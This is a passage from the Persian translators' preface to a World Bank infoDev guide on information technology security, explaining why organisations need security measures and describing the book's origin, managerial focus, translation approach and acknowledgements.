‫ﺩﺍﺭﺩ؛ ﻭ ﻫﺮﻳﮏ ﺍﺯ ﺍﻳﻦ ﻋﻮﺍﻣﻞ ﺧﻮﺩ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺩﻟﻴﻞ ﻣﺤﮑﻤﻲ ﺑﺮﺍﻱ ﺟﺪﻱ ﮔﺮﻓﺘﻦ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺍﺳﺖ‪.‬‬
‫ﺍﮐﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﻧﻮﺍﻉ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺧﺮﺍﺑﮑﺎﺭﺍﻥ ﻫﺴﺘﻨﺪ؛ ﺗﻬﺪﻳﺪﺍﺗﻲ ﭼﻮﻥ ﺩﺳﺘﮑﺎﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺮﺟﻊ ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‪ .‬ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ‪ ،‬ﻋﻮﺍﻣﻠﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﺰﺍﻳـﺎﻱ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﻪ ﺷـﻤﺎﺭ‬
‫ﺭﻭﻧﺪ )ﻣﺜﻞ ﺳﺮﻋﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻻ(‪ ،‬ﺍﮔﺮ ﺗﺤﺖ ﮐﻨﺘﺮﻝ ﻧﺒﺎﺷﻨﺪ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺷﻮﻧﺪ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺑﺪﻧﻴﺖ‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﻧﻔﻮﺫ ﻭ ﺧﺮﺍﺑﻜﺎﺭﻱ‪ ،‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﻭ ﻳﺎ ﺍﺧﺎﺫﻱ ﺑﻴﺎﻧﺠﺎﻣﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﻣﺸﻜﻼﺕ ﻃﺒﻴﻌـﻲ ﻭ ﺧﻄﺎﻫـﺎﻱ ﻏﻴﺮﻋﻤـﺪﻱ ﻛـﻪ ﺗﻮﺳـﻂ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﻓﻘﺪﺍﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻﺤﻴﺢ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺞ ﻣﺨﺮﺑﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪.‬‬
‫ﺩﺭ ﮐﻨﺎﺭ ﻫﻤﺔ ﺍﻳﻦ ﻣﺴﺎﺋﻞ‪ ،‬ﻣﻮﺿﻮﻉ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﺑﺮ ﭘﻴﭽﻴﺪﮔﻲ ﮐﺎﺭ ﺩﻭﻟﺘﻬـﺎ ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺣﻴﺎﺗﻲ ﺧﺪﻣﺎﺕ ﻋﻤﻮﻣﻲ ﻣﻲﺍﻓﺰﺍﻳﺪ‪ ،‬ﻭ ﺍﻫﻤﻴﺖ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻭﻟﺘﻲ‪ ،‬ﺍﻫﻤﻴﺖ ﭘﺮﺩﺍﺧﺘﻦ ﺻﺤﻴﺢ ﻭ ﻣﺆﺛﺮ ﺁﻧﻬﺎ ﺑﻪ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺩﻭ‬
‫ﭼﻨﺪﺍﻥ ﻣﻲﮐﻨﺪ‪ .‬ﺁﺧﺮﻳﻦ ﺁﻣﺎﺭﻫﺎﻱ ﺟﻬﺎﻧﻲ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺩﻭﻟﺘﻲ ﻭ ﺗﺠﺎﺭﻱ ﻛﻪ ﺗﻮﺳـﻂ ﻭﻳـﺮﻭﺱ‪ ،‬ﻛـﺮﻡ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ‬
‫ﺳﺮﻭﻳﺲ ﺑﻮﻗﻮﻉ ﭘﻴﻮﺳﺘﻪ‪ ،‬ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺧﻮﺑﻲ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﺪ‪ .‬ﻃﺒﻖ ﺗﺨﻤﻴﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ‬
‫)ﮐﻪ ﺑﻌﻨﻮﺍﻥ ﭘﻴﺸﺮﻭ ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ(‪ ،‬ﺗﻨﻬـﺎ ﺩﺭ ﺳـﺎﻝ ‪ ۲۰۰۳‬ﺿـﺮﺭﻫﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪﻥ ﺍﻣﻨﻴـﺖ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻟﻎ ﺑﺮ ‪ ۱۰‬ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺑﺮﺁﻭﺭﺩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺎ ﺍﻳﻦ ﺍﻭﺻﺎﻑ‪ ،‬ﺗﺪﻭﻳﻦ ﻭ ﺍﺟﺮﺍﻱ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻗﺒﺎﻝ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﮔﺴﺘﺮﺩﻩ‪ ،‬ﺿﺮﻭﺭﺗﻲ ﺍﺟﺘﻨﺎﺏ ﻧﺎﭘـﺬﻳﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻣﺤـﺴﻮﺏ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺗﺪﺍﺑﻴﺮ ﻣﻨﺎﺳﺐ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﻨﺪ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﻣﻴﺰﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺭﺍ ﺩﺭ ﺣـﺪ‬
‫ﺑﺴﻴﺎﺭ ﻧﺎﭼﻴﺰﻱ ﻧﮕﻪ ﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﻗﺎﺑﻠﻴﺖ ﻭﺍﮐﻨﺶ ﺳﺮﻳﻊ ﻭ ﻣﺆﺛﺮ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ ﺗﺎ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺗﻬﺎ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﺯ ﭘـﻴﺶ ﺗﻌﻴـﻴﻦ‪-‬‬
‫ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻨﺪ ﺗﺎ ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺍﻳﻤﻨﻲ ﺍﻃﻼﻋﺎﺕ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ ﻭ ﮐﺴﺐ ﻭ ﮐﺎﺭ ﺑﺎ ﺧﻴﺎﻟﻲ ﺁﺳﻮﺩﻩﺗﺮ ﺗﺪﺍﻭﻡ ﻳﺎﺑﺪ‪.‬‬
‫"ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ" ﭘﺲ ﺍﺯ ﺩﺭﮎ ﺿﺮﻭﺭﺕ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‪ ،‬ﺑﻪ ﺳﻔﺎﺭﺵ ﺑﺎﻧﮏ ﺟﻬـﺎﻧﻲ ﻭ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ‬
‫‪) infoDev‬ﻳﮑﻲ ﺍﺯ ﺯﻳﺮﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺑﺎﻧﮏ ﺟﻬﺎﻧﻲ( ﻭ ﺑﻪ ﻋﻨﻮﺍﻥ ﺗﻼﺷﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﮐـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺩﺭ‬
‫ﺍﻳﻦ ﻧﻬﺎﺩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﺪﻭﻳﻦ ﻭ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦﺑﺎﺭ ﺩﺭ ﺍﺟﻼﺱ ﻧﺨﺴﺖ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ )‪ (WSIS‬ﺩﺭ ﺳـﻮﺋﻴﺲ‪ ،‬ﺩﺭ ﺩﺳـﺎﻣﺒﺮ ﺳـﺎﻝ ‪۲۰۰۳‬‬
‫ﻣﻴﺎﻥ ﺷﺮﮐﺖﮐﻨﻨﺪﮔﺎﻥ ﺗﻮﺯﻳﻊ ﺷﺪ‪ .‬ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ ﮐﺘﺎﺏ ﺣﺎﺻﻞ ﺑﺮﺭﺳﻲ ﮐﺘﺎﺑﻬـﺎ‪ ،‬ﻣﻘـﺎﻻﺕ‪ ،‬ﺭﺳـﺎﻟﻪﻫـﺎ‪ ،‬ﻭ ﻣـﺴﺘﻨﺪﺍﺕ ﺗﺨﺼـﺼﻲ ﺯﻳـﺎﺩﻱ ﺍﺯ‬
‫ﮐﺎﺭﺷﻨﺎﺳﺎﻥ ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻳﻦ ﺣﻮﺯﻩ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺍﺳﺖ‪ .‬ﻓﻬﺮﺳﺖ ﮐﺎﻣﻠﻲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺟـﻊ ﺩﺭ ﺑﺨـﺶ ﺷـﺸﻢ )ﭘﻴﻮﺳـﺘﻬﺎ( ﺁﻣـﺪﻩ ﺍﺳـﺖ ﮐـﻪ‬
‫ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﺤﺘﺮﻡ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﮑﺎﺕ ﻭ ﻣﻮﺿﻮﻋﺎﺕ ﻧﻴﺰ ﺁﮔﺎﻫﻲ ﻳﺎﺑﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٠‬‬

‫ﮐﺘﺎﺏ ﺣﺎﺿﺮ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﮑﻪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻌﺎﺭﻳﻒ ﻭ ﺭﺍﻫﮑﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﻋﻤﻮﻣﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﮐﺮﺩﻩ‪ ،‬ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﻣﺪﻳﺮﻳﺘﻲ ﺁﻧﻬﺎ ﺭﺍ ﻧﻴﺰ‬
‫ﻣﺪﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ ﻭ ﺩﺭ ﻣﺘﻦ ﺍﻭﻟﻴﻪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﺮﺟﻤﺔ ﺁﻥ ﺗﻼﺵ ﺷﺪﻩ ﺗﺎ ﺣﺪ ﺍﻣﮑﺎﻥ ﻣﻄﺎﻟﺐ ﺑﮕﻮﻧﻪﺍﻱ ﻋﻨﻮﺍﻥ ﺷﻮﻧﺪ ﮐـﻪ ﻓﻬـﻢ ﻭ ﺩﺭﮎ‬
‫ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺑﻪ ﺩﺍﻧﺶ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﮐﺎﺭ ﺟﺎﻣﻌﺔ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ ﮐﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ )ﺧﺼﻮﺻﹰﺎ ﻣـﺪﻳﺮﺍﻥ(‬
‫ﺑﻴﺎﻳﺪ‪ ،‬ﻭ ﻟﺬﺍ ﻣﻲﺗﻮﺍﻥ ﺳﺮﻓﺼﻠﻬﺎﻳﻲ ﺍﺯ ﺁﻧﺮﺍ ﺩﺭ ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮐﻮﺗﺎﻩﻣﺪﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ‪.‬‬
‫ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻧﻲ‪ ،‬ﮐﺘﺎﺑﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻨﺘﺸﺮ ﻭ ﺑﺘـﺎﺯﮔﻲ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺗﻮﺳـﻂ‬
‫ﻻ ﭼﻮﻥ ﺑﻪ ﻣﻮﺿﻮﻋﻲ ﺗﺨﺼﺼﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﭘﺮﺩﺍﺧﺘـﻪﺍﻧـﺪ‪ ،‬ﻓﺎﻗـﺪ ﻧﮕـﺎﻩ‬ ‫ﻣﺘﺮﺟﻤﺎﻥ ﺑﺎﺗﺠﺮﺑﻪ ﻭ ﻳﺎ ﺟﻮﺍﻥ ﺑﻪ ﻓﺎﺭﺳﻲ ﺗﺮﺟﻤﻪ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﮐﻼﻥ ﻭ ﻣﺪﻳﺮﻳﺘﻲ ﺑﻪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻨﺪ‪ .‬ﮐﺘﺎﺑﻲ ﮐﻪ ﭘﻴﺶ ﺭﻭﻱ ﺷﻤﺎ ﺍﺳﺖ‪ ،‬ﺑﺎ ﻧﮕﺎﻩ ﮐﻼﻥ ﺑﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‪ ،‬ﮐﻮﺷﻴﺪﻩ ﻣﻔﺎﻫﻴﻢ ﻣﻄـﺮﺡ ﺩﺭ‬
‫ﻫﺮﻳﮏ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﺁﻧﺮﺍ ﺷﺮﺡ ﺩﻫﺪ‪ ،‬ﻭ ﺁﻧﺠﺎ ﮐﻪ ﻻﺯﻡ ﺑﻮﺩﻩ ﺍﺯ ﺑﺮﺭﺳﻲ ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﻧﻴﺰ ﻏﺎﻓﻞ ﻧﺸﺪﻩ‪ ،‬ﻫﺮﭼﻨﺪ ﻫﻴﭽﮕﺎﻩ ﺁﻧﭽﻨﺎﻥ ﻭﺍﺭﺩ ﻣﺴﺎﺋﻞ‬
‫ﻓﻨﻲ ﻧﺸﺪﻩ ﮐﻪ ﮐﻼﻥﻧﮕﺮﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺍﻳﻨﮑﺎﺭ ﺭﺍ ﺑﻪ ﮐﺘﺎﺑﻬﺎﻱ ﺗﺨﺼﺼﻲ ﺍﻣﻨﻴﺖ ﻭﺍﮔﺬﺍﺭ ﮐﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﺘﺮﺟﻤﺎﻥ ﺍﻳﻦ ﺍﺛﺮ ﻫﻤﻮﺍﺭﻩ ﮐﻮﺷﻴﺪﻩﺍﻧﺪ ﺗﺎ ﺩﺭ ﺍﻧﺘﻘﺎﻝ ﻣﻔﺎﻫﻴﻢ ﻭ ﻧﮑﺎﺕ ﺍﻳﻦ ﮐﺘﺎﺏ‪ ،‬ﺣﻔﻆ ﺍﻣﺎﻧﺖ ﻧﻤﺎﻳﻨﺪ ﻭ ﻫﻴﭽﮕﺎﻩ ﻣﻌﺎﻧﻲ ﺭﺍ ﻓـﺪﺍﻱ ﺍﻟﻔـﺎﻅ‬
‫ﻧﮑﺮﺩﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻭﺍﮊﻩﺳﺎﺯﻱ ﻳﺎ ﻣﻌﺎﺩﻝﺳﺎﺯﻱ ﻧﻤﻮﺩﻩﺍﻧﺪ‪ ،‬ﮐﻪ ﮐﺎﺭﻱ ﻃﺎﻗﺖﻓﺮﺳﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺖﺁﻭﺭ ﺍﺳﺖ‪ .‬ﺳﺎﻳﺮ ﻋﻨـﺎﻭﻳﻨﻲ ﮐـﻪ ﺑـﺮﺍﻱ‬
‫ﺁﻧﻬﺎ ﻣﻌﺎﺩﻝ ﻓﺎﺭﺳﻲ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺳﺎﺧﺘﻪ ﻧـﺸﺪﻩ ﻧﻴـﺰ ﺑـﺼﻮﺭﺕ ﺍﺻـﻠﻲ ﺩﺭ ﺗﺮﺟﻤـﻪ ﺗﮑـﺮﺍﺭ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﻣﺤﺘـﺮﻡ ﺍﻋـﻢ ﺍﺯ‬
‫ﺻﺎﺣﺒﻨﻈﺮﺍﻥ‪ ،‬ﺍﺳﺎﺗﻴﺪ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ‪ ،‬ﻭ ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﺑﺎ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺍﻧﺘﻘﺎﺩﺍﺕ ﺧﻮﺩ ﻣﺎ ﺭﺍ ﺩﺭ ﺭﻓـﻊ ﻟﻐﺰﺷـﻬﺎ ﻭ ﮐﺎﺳـﺘﻴﻬﺎﻱ ﺍﺣﺘﻤـﺎﻟﻲ ﺍﻳـﻦ‬
‫ﮐﺘﺎﺏ ﺁﮔﺎﻩ ﺳﺎﺯﻧﺪ ﺗﺎ ﺩﺭ ﺻﺪﺩ ﺭﻓﻊ ﺁﻧﻬﺎ ﺑﺮﺁﻳﻴﻢ‪.‬‬
‫ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﺩﺭﮔﻤﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﮐﻪ ﺑﻪ ﺗﺎﺯﮔﻲ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻋﻼﻗﻪﻣﻨﺪ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﻨﻮﺯ ﺑﺎ ﺍﺻﻄﻼﺣﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻭ ﻣﻌﺎﺩﻟﻬﺎﻱ ﺭﺍﻳﺞ ﺁﻧﻬﺎ ﺁﺷﻨﺎﻳﻲ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﮐﺘﺎﺏ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ ﮐﻪ ﺩﺭ ﮐﺘﺎﺏ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻲ ﺑﮑﺎﺭﺭﻓﺘﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺻﻔﺤﻪﺁﺭﺍﻳﻲ ﮐﺘﺎﺏ ﻧﻴﺰ ﺍﺯ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﮐﺘﺎﺏ ﺍﻟﮕﻮﺑﺮﺩﺍﺭﻱ ﺷـﺪﻩ ﻭ ﺟـﺰ‬ ‫ﺷﺪﻩ ﻭ ﻧﻴﺰ ﻣﻌﺎﺩﻝ ﻓﺎﺭﺳ ﹺ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ ‪ -‬ﮐﻪ ﺑﺪﻟﻴﻞ ﻭﺟﻮﺩ ﻣﺘﻮﻥ ﻓﻨﻲ ﻭ ﻣﺘﻦﺑﺮﻧﺎﻣﻪ ﺯﻳﺎﺩ‪ ،‬ﺍﺯ ﺗﻤﺎﻡ ﻓﻀﺎﻱ ﺻﻔﺤﻪ ﺑﺮﺍﻱ ﻣﺘﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ ‪ -‬ﺩﺭ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﺍﺯ‬
‫ﺻﻔﺤﻪﺁﺭﺍﻳﻲ ﺩﻭﺳﺘﻮﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﭘﺎﻳﺎﻥ ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﺍﺯ ﺧﺎﻧﻢ ﻣﺮﻳﻢ ﺍﻓﺘﺨﺎﺭﻱ ﻭ ﺁﻗﺎﻳﺎﻥ ﻣﺤﻤﺪﻣﻬﺪﻱ ﺟﺎﻗﻮﺭﻱ‪ ،‬ﺍﻓﺸﻴﻦ ﻻﻣﻌﻲ‪ ،‬ﻭ ﻧﻴﻤﺎ ﻟﻄﻔﻲ ﮐـﻪ ﺩﺭ ﺗﻬﻴـﺔ‬
‫ﺍﻳﻦ ﺍﺛﺮ ﻣﺘﺤﻤﻞ ﺯﺣﻤﺎﺗﻲ ﺷﺪﻧﺪ‪ ،‬ﮐﻠﻴﺔ ﺍﺳﺎﺗﻴﺪ ﻭ ﺻﺎﺣﺒﻨﻈﺮﺍﻧﻲ ﮐﻪ ﺑﺎ ﺍﺭﺍﺋﻪ ﻧﻈﺮﺍﺕ ﮐﺎﺭﺷﻨﺎﺳﻲ ﻭ ﺭﺍﻫﮕـﺸﺎﻱ ﺧـﻮﺩ ﺑـﻪ ﻣـﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﮑـﺎﺭ‬
‫ﺩﻟﮕﺮﻣﻲ ﺩﺍﺩﻧﺪ‪ ،‬ﮐﻠﻴﺔ ﻫﻤﮑﺎﺭﺍﻧﻲ ﮐﻪ ﺑﻪ ﻧﻮﻋﻲ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺗﻨﻈﻴﻢ ﺍﻳﻦ ﺍﺛﺮ ﻧﻘﺶ ﺩﺍﺷﺘﻨﺪ‪ ،‬ﻭ ﻧﻴﺰ ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷـﻮﺭﺍﻱ ﻋـﺎﻟﻲ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﮐـﻪ‬
‫ﺯﺣﻤﺖ ﭼﺎﭖ ﻭ ﻧﺸﺮ ﺍﻳﻦ ﮐﺘﺎﺏ ﺭﺍ ﻋﻬﺪﻩﺩﺍﺭ ﺷﺪ ﺻﻤﻴﻤﺎﻧﻪ ﺗﺸﮑﺮ ﻧﻤﺎﻳﻴﻢ‪.‬‬
‫ﺍﻣﻴﺪ ﺁﻧﮑﻪ ﺍﻳﻦ ﻣﮑﺘﻮﺏ ﺑﺘﻮﺍﻧﺪ ﺍﺛﺮﻱ ﻫﺮﭼﻨﺪ ﺟﺰﺋﻲ ﺩﺭ ﺳﻴﺮ ﭘﻴﺸﺮﻓﺖ ﻭ ﺗﻮﺳﻌﺔ ﮐﺸﻮﺭ ﺩﺭ ﻣﺴﻴﺮ ﻧﻴﻞ ﺑﻪ ﺍﻳﺮﺍﻧﻲ ﺁﺑﺎﺩ‪ ،‬ﺁﺯﺍﺩ ﻭ ﺳﺮﻓﺮﺍﺯ ﻣﺆﺛﺮ ﺍﻓﺘﺪ‪.‬‬

‫ﮔﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ‬
‫ﺗﺎﺑﺴﺘﺎﻥ ‪۱۳۸۴‬‬
‫ﺩﻳﺒﺎﭼﻪ‬

‫ﻛﻠﻴﺔ ﺍﻋﺘﺒﺎﺭﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﻬﻴﻪ ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺍﺯ ﻃﺮﺡ ‪ infoDev‬ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‪ ١‬ﺗﺄﻣﻴﻦ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻃﻲ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ‬
‫ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‪ ٢‬ﺑﻪ ﺍﻫﻤﻴﺘﻲ ﻭﻳﮋﻩ ﺩﺳﺖ ﻳﺎﻓﺘﻪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﮔﺮﻭﻩ ﻣﺸﺎﻭﺭﺓ ﻓﻨـﻲ ‪ ٣infoDev‬ﻭﺍﻗـﻊ ﺷـﺪﻩ‬
